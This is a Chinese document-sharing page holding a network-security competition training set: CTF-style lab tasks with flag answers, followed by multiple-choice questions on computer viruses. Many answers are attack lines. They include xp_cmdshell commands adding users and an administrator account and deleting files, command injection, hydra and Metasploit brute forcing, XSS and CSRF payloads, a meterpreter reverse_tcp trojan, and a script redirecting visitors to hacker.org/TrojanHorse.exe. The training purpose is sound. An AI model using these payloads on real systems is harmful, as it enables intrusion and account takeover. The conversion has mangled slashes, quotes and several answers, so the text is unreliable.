《最新网络空间安全实训题及讲解.docx》由会员分享,可在线阅读,更多相关《最新网络空间安全实训题及讲解.docx(196页珍藏版)》请在淘文阁 - 分享文档赚钱的网站上搜索。
1、网络空间安全实训题及讲解(可以直接使用,可编辑 优秀版资料,欢迎下载)训测二1-1 在服务器场景 CentOS5。5上 通过Linux命令行开启mysql服务,并将开启该服务命令字符串作为flag值提交: service mysqld start训测二12 在服务器场景 CentOS5.5上 进入mysql 删除user表中host为127。0。0。1 的用户 ,查询剩下用户记录,把查询结果倒数第二条记录的host字段值作为flag值提交:localhost训测二1-3在服务器场景 CentOS5.5上进入mysql (使用grant语句)添加一个用户test 密码为20210829,它的ho
2、st为172.19。5.100 ,并赋予所有权限,将所输入代码作为flag值提交:grant all privileges ON *。* TO testidentified by 20210829with grant option;训测二14在服务器场景 CentOS5。5上进入mysql 的配置文件,限制最大连接数为2,并将mysql的配置文件路径F1,及其增加的一行F2作为flag值提交:格式为(F1F2) (/etc/my。cnfmax_user_connections=2)训测二15在服务器场景 CentOS5。5上进入mysql 的配置文件,使其他主机不能远程连接数据库F1,并禁止对
3、本地文件存取F2,将其增加行作为Flag值提交:格式为F1F2skip-networking|set-variable=local-infile=0训测二1-6在服务器场景 CentOS5.5上进入mysql 的配置文件, 启动项加固 ,使访问能被审计,并将日志其路径作为flag值提交./usr/local/mysql/log/mysql.log训测二1-7在服务器场景 CentOS5.5上开启 服务,其配置文件的路径作为flag值提交: /etc/ d/conf/ d.conf训测二1-8在服务器场景 CentOS5。5上进入 d配置文件,将网站发布目录作为flag值提交:/var/www/
4、html训测二19在服务器场景 CentOS5。5上进入 d配置文件修改代码使其在出现错误页的时候不显示服务器操作系统的名称。将修改后的一行代码作为flag值提交:ServerTokens Prod训测二1-10在服务器场景 CentOS5.5上进入 d配置文件修改代码使其不回显apache版本信息。将修改后的代码作为flag值提交:ServerSignature Off训测二111用渗透平台nmap 扫描靶机CentOS5。5 将其apache版本信息作为flag提交.Apache d 2。2。3 ((CentOS))训测二21在服务器场景Windows2003上对sqlserver2000
5、进行 sp4补丁安装,重启。将其补丁的文件夹名字F1和增加的端口号(用 netstat an查询)F2作为flag值提交:格式为:F1|F2SQL2KSP41433训测二2-2在服务器场景 Windows2003上进入sqlserver2000 服务器使用存储过程添加系统用户njcx。将其输入代码作为flag值提交:exec master。dbo.xp_cmdshell net user njcx /add 训测二2-3在服务器场景Windows2003上关闭xp_cmdshell服务,将其关闭的代码作为flag值提交:exec sp_dropextendedproc xp_cmdshell训
6、测二24在服务器场景Windows2003 上开启xp_cmdshell 服务,将其开启的代码作为flag值提交:exec sp_addextendedproc xp_cmdshell,xplog70.dll训测二25在服务器场景 Windows2003上 使用netstat an 查看端口,并将 有关的一行作为flag值提交:TCP 0.0。0.0:80 0。0。0.0:0 LISTENING训测二2-6在服务器场景 Windows2003上用浏览器打开网页127.0。0.1 将其内容作为flag值提交。训测二2-7 用渗透平台nmap 扫描靶机win2003将其iis版本作为flag提交。
7、Microsoft IIS d 6。0训测三-1.1在服务器场景CentOS5。5上通过Linux命令行关闭ssh服务,将关闭该服命令字符串作为Flag值提交。Service sshd stop训测三1。2 在服务器场景CentOS5.5上通过/Flag/ifconfig去查询ip地址,把flag的值作为flag提交.sbin训测三-1。3用渗透平台对服务器场景CentOS5。5进行综合扫描渗透测试,把显示结果正数第5行的四个单词作为flag值提交。格式为:|。|。.|.。|.|PORTSTATE|SERVICE|VERSION|训测三-1.4在服务器场景CentOS5.5上通过Linux命令
8、行开启ssh服务,将开启该服命令字符串作为Flag值提交./etc/init。d/sshd start训测三-1.5 用渗透平台对服务器场景CentOS5.5进行hydra命令爆破使用所给字典。把现实结果的倒数第二行的第二个数字F1和正确结果的login:后面的字符串F2作为flag值提交.格式为:F1F21&root训测三1。6用渗透平台对服务器场景CentOS5.5 进行ssh远程登录并且使用 wireshark对其进行协议分析,并把发送的第一个包的长度作为flag值提交48训测三-1。7用渗透平台对服务器场景CentOS5.5 进行ssh远程登录并且使用 wireshark对其进行协议分
9、析,并把现实结果中物理mac地址加密方式作为flag值提交。Hmac-md5训测三2.1 打开靶机,使其与物理机上的window2003虚拟机 建立 ipsec vpn预共享秘钥为123123,用渗透平台wireshark对其进行监听,用其第一阶段的全称作为flag值提交。Internet Security Association and Key Manage Protocol训测三2.2打开靶机,使其与物理机上的window2003虚拟机 建立 ipsec vpn,用渗透平台wireshark对其进行监听,用其第二阶段的全称作为flag值提交.、Encap sulating Security
10、 Payload 训测三2.3打开靶机,使其与物理机上的window2003虚拟机 建立 ipsec vpn,用渗透平台wireshark对其进行监听,找到第一阶段现实结果中的Version:后面的字符串作为flag提交。1。0训测三2.4打开靶机,使其与物理机上的window2003虚拟机 建立 ipsec vpn,用渗透平台wireshark对其进行监听,找到第二阶段的显示结果的的倒数第一行作为flag值提交。Data (68 bytes)训测三-3.1打开虚拟机2003中的Ethereal,监听到本机通过internet Explorer 访问靶机服务器场景上的Test.html页面内容
11、,并将Ethereal监听到的Test.html页面内容在Ethereal程序当中的显示结果倒数第二行内容作为flag值提交。/body训测三-3。2在虚拟机2003 与靶机2003之间建立sslvpn,须通过CA服务颁发证书;2003服务器域名为www。test ,并将2003 服务器个人证书信息的“颁发给:”内容作为flag值提交。www。test 训测三-3.3在虚拟机2003 与靶机2003之间建立sslvpn,再次打开Ethereal,监听Internet Explorer访问靶机2003服务器场景流量,验证此时Ethereal无法明文监听到intnet Explorer访问靶机20
12、03场景的 流量,并将靶机2003服务器通过ssl Record Layer对internet Explorer请求响应的加密应用层数据长度Length值作为flag值提交.301训测四11通过渗透平台对CentOS5.5进行渗透,利用msf工具对其进行远程超级管理员口令破解,使其通过root用户登入目标靶机(密码为654321),并将漏洞的路径作为flag值提交。auxiliary/scanner/ssh/ssh_login训测四1-2 对CentOS5。5服务器场景进行安全加固,阻止PC中渗透测试平台对服务器场景CentOS5.5进行远程超级管理员口令暴力破解,并将配置文件路径及配置文件加
13、固的内容字符串作为Flag提交。格式为:F1&F2 /etc/ssh/sshd_config&PermitRootLogin no训测四13再次通过渗透平台对CentOS5.5进行渗透,利用msf工具对其进行远程超级管理员口令破解,使其通过root用户登入目标靶机,并将现实结果的倒数第二行作为flag值提交: Scanned 1 of 1 hosts (100% complete)训测四14在服务器场景CentOS5.5上通过Linux命令行添加用户userl,并配置密码。将添加用户的命令字符串F1与配置密码的命令字符串F2作为Flag值提交;格式为:F1&F2F3 adduser userl
14、&password userl训测四1-5在服务器场景 CentOS5。5上开启 服务,其配置文件的路径作为flag值提交: /etc/ d/conf/ d.conf训测四1-6通过PC2中渗透测试平台对服务器场景CentOS5.5进行操作系统综合扫描渗透测试(使用工具NMAP,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;A训测四19通过渗透平台对服务器场景CentOS5。5进行ARP扫描渗透测试(使用arping,发送请求数据包数量为5个),并将该操作使用命令中固定不变的字符串作为flag提交;arping t 5训测四110通过渗透平台对服务器场景Cent
15、OS5.5进行ARP扫描渗透测试(使用arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第二个数字作为flag提交;5训测四2-1在靶机与虚拟机上做ipsecvpn,组阻止Sniffer监听渗透测试,虚拟机通过ping访问WebServ2003服务器,将第一个数据包回显结果作为flag提交;Negotiating IP Security。训测四22打开靶机,使其与物理机上的window2003虚拟机 建立 ipsec vpn,用渗透平台wireshark对其进行监听,找到第二阶段的显示结果的的倒数第一行作为flag值提交。Data (68 bytes)训测四23在虚拟
16、机2003 与靶机2003之间建立sslvpn,再次打开Ethereal,监听Internet Explorer访问靶机2003服务器场景流量,验证此时Ethereal无法明文监听到intnet Explorer访问靶机2003场景的 流量,并将靶机2003服务器通过ssl Record Layer对internet Explorer请求响应的加密应用层数据长度Length值作为flag值提交。训测四2-4在服务器场景Windows2003上对sqlserver2000进行 sp4补丁安装,重启,将增加的端口整行信息作为flag值提交.TCP 0。0。0。0:1433 0。0.0.0:0 LI
17、STENING训测四25通过PC中的渗透测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试,并将扫描结果作为Flag提交;训测四2-6通过对服务器场景WebServ2003的数据库服务进行安全加固,阻止PC中渗透测试平台对其进行数据库超级管理员密码暴力破解渗透测试,并将加固身份验证选项中的最后一个字符串作为Flag提交。Windowsw训测四27查找windows2003靶机里的完整的计算机名称作为flag值提交;hh-admin训测四2-8 查找windows2003靶机系统属性中系统:后的字符串作为flag值提交;Microsoft Windows Server 2003
18、 Standard Edition训测四29查找windows2003靶机来宾访客用户的名称,将其作为flag值提交;Guest训测四2-10 查找windows2003靶机的默认共享名,并将查找命令F1与默认共享名F2作为flag值提交。格式为:F1-F2net share-C训测五11使用bt5对靶机进行渗透测试,通过暴力破解ssh密码登录系统,并将密码作为flag值提交;981训测五12在服务器场景CentOS5。5上通过Linux命令行开启 服务,并将开启该服务命令字符串作为Flag值提交;/etc/init.d/ d start训测五14通过PC中渗透测试平台对服务器场景CentOS
19、5.5进行操作系统扫描渗透测试(使用工具NMAP,使用必须要使用的参数),并将该操作显示结果“OS Details:之后的字符串作为Flag提交;Linux 2.6.9 训测五15在服务器场景CentOS5.5上通过Linux命令行关闭ssh服务,再次打开bt5,行操作系统综合扫描渗透测试,将关闭该服务命令字符串以及第二个服务信息作为Flag值提交;格式为:f1|f2service sshd stop|111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)训测五16在服务器场景CentOS5。5上通过Linux命令行添加用户Za,添加密码并且给予ro
20、ot权限,将命令字符串作为Flag值提交;格式为:F1|F2|F3useradd Zapasswd Zausermod g root Za 训测五1-9在服务器场景 CentOS5.5上进入 d配置文件修改代码使其在出现错误页的时候不显示服务器操作系统的名称。将修改后的一行代码作为flag值提交:ServerTokens Prod训测五1-10在服务器场景 CentOS5。5上进入 d配置文件修改代码使其不回显apache版本信息。将修改后的代码作为flag值提交:ServerSignature Off训测五1-11 在服务器场景CentOS5.5上通过/ifconfig去查询ip地址,把的值
21、作为flag提交。sbin训测五1-12用渗透平台对服务器场景CentOS5。5 进行ssh远程登录并且使用 wireshark对其进行协议分析,并把发送的第一个包的长度及encryption加密算法作为flag值提交;格式为f1-f248-aes128ctr训测五-1-13通过PC中渗透测试平台对服务器场景CentOS5。5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit中arp_sweep模块存放路径字符串作为Flag(形式:字符串1/字符串2/字符串3.。)提交;auxiliary/scanner/discovery/arp_s
22、weep训测五114通过PC中渗透测试平台对服务器场景CentOS5。5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;appears训测五-1-15通过通过PC中渗透测试平台对服务器场景CentOS5。5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5。5在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的倒
23、数第二个单词作为Flag提交;execution训测五116通过PC中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交;exploit训测五21在服务器场景Windows2003上对sqlserver2000进行 sp4补丁安装,重启.将其补丁的文件夹名字F1和增加的端口号信息(用 netstat -an查询)F2作为flag值提交:格式为:F1F2SQL2KSP4TCP 0。0.0.0:1433
24、 0.0。0。0:0 LISTENING训测五2-2在bt5上使用hydra暴力破解sql-server数据库(mssql),并将其爆破结果中正确结果login:结果和password:结果作为flag值提交;格式为f1&f2sa&1234训测五2-3在靶机2003上打开sql-server,进行存储过程,在c盘下创建文件夹njcx,将其过程作为flag值提交。exec master。dbo。xp_cmdshell md c:njcx训测五2-4在虚拟机2003 与靶机2003之间建立sslvpn,再次打开Ethereal,监听Internet Explorer访问靶机2003服务器场景www
25、。test。com流量,验证此时Ethereal无法明文监听到intnet Explorer访问靶机2003场景的 流量,并将靶机2003服务器通过ssl Record Layer对internet Explorer请求响应的加密应用层数据长度Length值作为flag值提交。299信息安全管理与评估补充题1. 配置靶机WebServ2003的DHCP功能,能够分配IP的范围为172.19。X。X(111150),XP客户端申请IP地址,将第二阶段和第四的数据包类型作为Flag值提交,格式为:F1F2;DHCP OFFERDHCP ACK2. 使用渗透机攻击WebServ2003,进行DHCP
26、地址池耗尽攻击,把使用中的IP地址数比例作为Flag提交;1003。进入loginAuth。php程序,修改PHP源程序,使之可以抵御SQL注入,并填补空缺处内容,将填补内容作为Flag提交,格式为F1F2|F3;Mssql_select_dbPassword$password4. 再次对该任务loginAuth.php页面注入点进行渗透测试,验证此次利用任意用户进行SQL注入渗透测试无效,并将回显提示信息作为Flag提交。Username Does Not Exist5。Web继续访问WebServ2003服务器,”/Employee Information Query”,分析该页面源程序,
27、找到提交的变量名,并作为Flag提交。usernm5. Web继续访问WebServ2003服务器,/”-”Employee Information Query”,分析该页面源程序,将表单提交方式作为Flag提交。get6. Web继续访问WebServ2003服务器,”/”-Employee Information Query”,分析该页面源程序,表单提交后跳转页面的路径作为Flag提交。list.html7. 对”Employee Information Query页面注入点进行渗透测试,根据输入“以及“_”的返回结果确定是注入点,并将显示结果倒数第三行内容作为Flag提交;Email:w
28、wyahoo。com。cn9。通过对该任务题目5页面注入点进行SQL注入渗透测试,删除WebServ2003服务器的C:目录下的1.txt文档,并将注入代码作为Flag提交。 exec master。dbo。xp_cmdshell del c:1。txt10. 进入WebServ2003服务器的C:AppServwww目录,找到QueryCtrl.php程序,分析并修改PHP源程序,将%替换为%,_替换为_使之可以抵御SQL注入渗透测试,并将修改后新增语句内容作为Flag提交。格式为F1F2-F3keyWord=addslashes(KeyWord);$keyWord=str_replace(
29、“”,”,KeyWord);keyWord=str_replace(“%_”,”_”,$KeyWord);11. 再次对该任务题目5页面注入点进行渗透测试,验证此次利用注入点对该WebServer进行SQL注入渗透测试无效,并将验证过程截图。将系统出现的错误提示作为Flag提交。Bad KeyWord!12. 进入WebServ2003服务器,禁用系统存储过程可以抵御SQL注入渗透测试,将禁用系统存储的语句作为Flag提交。格式为Y1Y2-Y3Y4。.13. 进入”/- Employee Message Board”Display Message页面,再次对页面注入点进行渗透测试,调用存储过程
30、删除WebServ2003服务器的C:目录下的1.txt文档,将页面提示第一个字符串作为Flag提交;Warning14. 进入”/ Employee Message Board”-”Display Message页面进行XSS渗透测试,循环弹框”Hacker!”,根据该页面的显示,确定是注入点,并将构造的注入代码作为Flag提交.scriptwhile(1)alert(“Hacker!”);;/script15. 通过IIS搭建网站( :/hacker。org/),并通过渗透机生成木马程序TrojanHorse。exe,将使用的工具和模块路径作为Flag提交。格式为F1&F2 msfpayl
31、oadWindows/meterpreter/reverse_tcp16. 对该任务题目1页面注入点进行渗透测试,使”/” Employee Message Board”Display Message页面的访问者执行网站( :/hacker.org/)中的木马程序: :/hacker。org/TrojanHorse。exe,并将注入代码作为Flag提交。 Location。href=“htt:/hacker。org/TrojanHorse.exe”;/script17. 进入WebServ2003服务器的C:AppServwww目录,找到insert.php程序,分析并修改PHP源程序,使用替
32、,使之可以抵御XSS渗透测试,并将需要使用的函数和增加语句作为Flag提交。格式为F1/F2Str_replaceinfo=str_replace(“ Employee Message Board-”Display Message”页面的访问者向页面ShoppingProcess。php提交参数goods=cpuquantity=10000,查看”/PurchasedGoods。php页面,并将注入代码作为Flag提交。 scriptdocument.location= :/192.168.204。126/ShoppingProcess。php?goods=cpuquantity=10000”
33、; 20. 进入WebServ2003服务器的C:AppServwww目录,找到DisplayMessage。php程序,分析并修改PHP源程序,使之可以抵御CSRF渗透测试,将需要用到的函数作为Flag提交。Strip_tags21. Web访问ebServ2003服务器,/ Display Directory”,分析该页面源程序,找到提交的变量名作为Flag。directory22. 对题目22页面注入点进行渗透测试,使页面DisplayDirectoryCtrl。php回显C:Windows目录内容的同时,对WebServer添加账号“Hacker”,将该账号加入管理员组,并将注入代码作
34、为Flag提交。WINDOWSnet user Hacker Pssword /addWINDOWSnet localgroup administrators Hacker /add24。对该任务题目22页面注入点进行第23题渗透测试,使页面DisplayDirectoryCtrl。php回显内容最后一行作为Flag提交.Display C:Directory 一、选择题1、引导型病毒程序被存放在_D_A、最后1个扇区中 B、第2物理扇区中 C、数据扇区中 D、引导扇区中2、文件被感染上病毒之后,其基本特征是_C_A、文件不能被执行 B、文件长度变短 C、文件长度加长 D、文件照常能执行3、计
35、算机病毒程序通常是用_A_语言编写的。A、汇编 B、高级 C、宏 D、机器4、病毒程序没有文件名,是靠_B_判别的。A、特征 B、标记 C、条件 D、长度5、机器染有病毒的一个基本特征是内存减少_A_A、1KB B、1MB C、2KB D、2MB6、文件型病毒传染的对象主要是_C_类文件.A、DBF B、PRG C、COM和EXE D、C7、DIR-11病毒的症状是_C_A、屏幕出现一个跳跃的小球 B、字符从屏幕的顶部纷纷下落C、屏幕出现一条“毛毛虫” D、演奏一段音乐干扰系统工作8、_C_类文件不易被感染上病毒A、COM B、EXE C、TXT D、BOOT9、公安部开发的KILL软件是用于
36、计算机的_C_A、病毒检查 B、病毒分析和统计 C、病毒防疫 D、病毒示范10、防病毒卡能够_B_A、杜绝病毒对计算机的侵害 B、发现病毒入侵迹象并及时阻止或提醒用户C、自动消除已感染的所有病毒 D、自动发现并阻止任何病毒的入侵11、计算机病毒通常分为引导型、文件型和_B_A、外壳型 B、复合型 C、内码型 D、操作系统型12、计算机病毒具有_A_A、传播性、潜伏性、破坏性 B、传播性、破坏性、易读性C、潜伏性、破坏性、易读性 D、传播性、潜伏性、安全性13、计算机病毒为了隐蔽起见,依靠它的_B_实现自身与合法系统的连接。A、系统调用部分 B、启动部分 C、破坏部分 D、传染部分14、以下措施
37、不能防止计算机病毒的是_A_A、软盘未贴写保护 B、先用杀病毒软件将从别人机器上拷来的文件清查病毒C、不用来历不明的磁盘 D、经常关注病毒软件的版本升级情况,并尽量取得最高版本的防毒软件15、计算机病毒主要是造成_C_损坏A、文字处理和数据库管理软件 B、操作系统和数据库管理系统C、程序和数据 D、系统软件和应用软件16、计算机病毒是一组计算机程序,它具有_D_A、传染性 B、隐蔽性 C、危害性 D、传染性、隐蔽性和危害性17、公安部开发的SCAN3。1软件是用于计算机的_A_A、病毒检查和消除部分病毒 B、病毒分析和统计 C、病毒防疫 D、病毒示范18、下面有关计算机病毒分类的说法,_B_是
38、正确的.A、病毒分十二类 B、病毒分为操作系统型和文件型 C、没有分类之说 D、病毒分为外壳型和入侵型19、计算机病毒_D_A、不影响计算机的运行速度 B、能造成计算机器件的永久性失效C、不影响计算机的运算结果 D、影响程序的执行,破坏用户数据与程序20、计算机病毒会造成计算机_C_的损坏。A、硬件、软件和数据 B、硬件和软件 C、软件和数据 D、硬件和数据21、下面有关计算机病毒的说法,_C_是正确的。A、计算机病毒是一个MIS程序 B、计算机病毒是对人体有害的传染病C、计算机病毒是一个能够通过自身复制传染,起破坏作用的计算机程序 D、计算机病毒是一段程序,但对计算机无害22、计算机病毒对于
39、操作计算机的人_C_A、只会感染,不会致病 B、会感染致病,但无严重危害 C、不会感染 D、产生的作用尚不清楚23、计算机病毒的危害性表现在_B_A、能造成计算机器件永久性失效 B、影响程序的执行,破坏用户数据与程序C、不影响计算机的运行速度 D、不影响计算机的运算结果,不必采取措施24、下列关于计算机木马的叙述中错误的一条是:_B_A、木马是一种计算机程序,它驻留在计算机里,当计算机启动的时候自动启动.B、木马程序具有传染性,它能传染给计算机中的其它应用程序.C、入侵者一般通过放置木马程序来控制用户的计算机。D、为了防范木马程序的攻击,用户不要随便运行来历不明的软件。25、下列叙述中,哪一条
40、是正确的_A_A、反病毒软件通常滞后于计算机新病毒的出现B、反病毒软件总是超前于病毒的出现,它可以查、杀任何种类的病毒C、感染过计算机病毒的计算机具有对该病毒的免疫性D、计算机病毒会危害计算机用户的健康26、计算机病毒是_B_。A、计算机系统自己生成的程序 B、一种人为特制的具有破坏性的计算机程序C、可传染疾病给生物体的病毒 D、计算机发生故障时产生的程序和数据27、下列关于计算机病毒的叙述中错误的一条是:_D_A、计算机病毒具有潜伏性 B、计算机病毒具有传染性C、计算机病毒是一个特殊的寄生程序D、感染过计算机病毒的计算机具有对该病毒的免疫性28、计算机的防、杀毒软件的作用是_D_. A、清除
41、已感染的任何病毒 B、查出已感染的任何病毒 C、查出并清除任何病毒 D、查出已知的病毒,清除部分病毒 29、发现计算机病毒以后,比较彻底的清除方式是_D_。 A、用查毒软件处理 B、删除磁盘文件C、用杀毒软件处理 D、格式化磁盘30、计算机病毒可以使整个计算机瘫痪,危害极大。计算机病毒是_B_A、一条命令 B、一段特殊的程序C、一种生物病毒 D、一种芯片31、计算机病毒是指_C_ 。A、带细菌的磁盘 B、已损坏的磁盘C、具有破坏性的特制程序 D、被破坏的程序32、下列关于计算机病毒的四条叙述中,有错误的一条是_A_A、计算机病毒是一个标记或一个命令B、计算机病毒是人为制造的一种程序C、计算机病
42、毒是一种通过磁盘、网络等媒介传播、扩散,并能传染其它程序的程序D、计算机病毒是能够实现自身复制,并借助一定的媒体存的具有潜伏性、传染性和破坏性的程序33、近年来计算机界常提到的“2000年问题”指的是_D_A、计算机将在2000年大发展问题B、计算机病毒将在2000年大泛滥问题C、NC和PC将在2000年平起平坐的问题D、有关计算机处理日期问题34、计算机病毒是一种_C_A、微生物感染 B、化学感染 C、程序 D、幻觉35、某片软盘上已感染病毒,为防止该病毒传染计算机系统,正确的措施是_A_A、将该软盘重新格式化 B、给软盘加上写保护 C、删除该软盘上的所有程序 D、保持软盘表面清洁36、目前
43、使用的防病毒软件的作用是_B_。A、清除已感染的任何病毒 B、查出已知的病毒,清除部分病毒C、查出任何已感染的病毒 D、查出并清除任何病毒37、微机病毒是一种_D_A、生物病毒感染 B、细菌感染 C、被损坏的程序 D、精心制的小程序38、计算机病毒具有隐蔽性、潜伏性、传播性、激发性和_C_A、恶作剧性 B、入侵性 C、破坏性和危害性 D、可扩散性39、下面列出的计算机病毒传播途径,不正确的说法是_D_A、使用来路不明的软件 B、通过借用他人的软件C、通过非法的软件拷贝 D、通过把多张软盘叠放在一起40、为了防止计算机病毒的传染,应该做到_C_A、经常格式化软盘上的文件 B、长期不用的文件要重新复制C、不使用来历不明的软盘上程序 D、有毒盘与干净盘不要放在一起41、如发现某张软盘有病毒,应采取措施是_D_A、销毁该软盘 B、删除软盘的可执行文件C、在另一台机器上使用该软盘 D、用无毒系统格式化该盘42、计算机病毒感染的主要对象是_C_ 类文件.A、。DBF B、.WPSC、。COM和。EXE D、.DOC43、 下列关于计算机
限制150内